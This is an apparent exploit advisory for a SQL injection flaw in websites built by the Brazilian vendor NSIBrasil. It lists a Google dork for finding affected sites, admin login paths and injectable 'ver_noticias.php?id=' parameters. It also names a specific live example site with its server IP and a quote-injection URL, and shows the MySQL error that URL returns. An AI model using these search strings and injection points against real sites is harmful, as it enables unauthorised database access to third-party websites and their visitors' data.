Desenvolvido por NSIBrasil Web Design SQL Injection

1. ########################################################
2.  
3. # Exploit Title : Desenvolvido por NSIBrasil Web Design SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 11/01/2019
7. # Vendor Homepage : nsibrasil.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desenvolvido por nsibrasil"
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. ########################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19.  
20. /stilo_gei/index.php
21. /sistema/
22.  
23. # SQL Injection Exploit :
24. ***********************
25.  
26. /site_v2/ver_noticias.php?id=[SQL Injection]
27.  
28. /ver_noticias.php?id=[SQL Injection]
29.  
30. ########################################################
31.  
32. # Example Vulnerable Site :
33. *************************
34.  
35. Note : (192.185.218.119) => There are 114 domains hosted on this server.
36.  
37. [+] monteirosouza.com.br/site_v2/ver_noticias.php?id=8%27 =>
38.  
39. [ Proof of Concept ] => archive.fo/tGWQV
40.  
41. ########################################################
42.  
43. # SQL Database Error :
44. **********************
45.  
46. Error: You have an error in your SQL syntax; check the manual that
47. corresponds to your MySQL server version for the right
48. syntax to use near ''8''' at line 1
49.  
50. ########################################################
51.  
52. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
53.  
54. ########################################################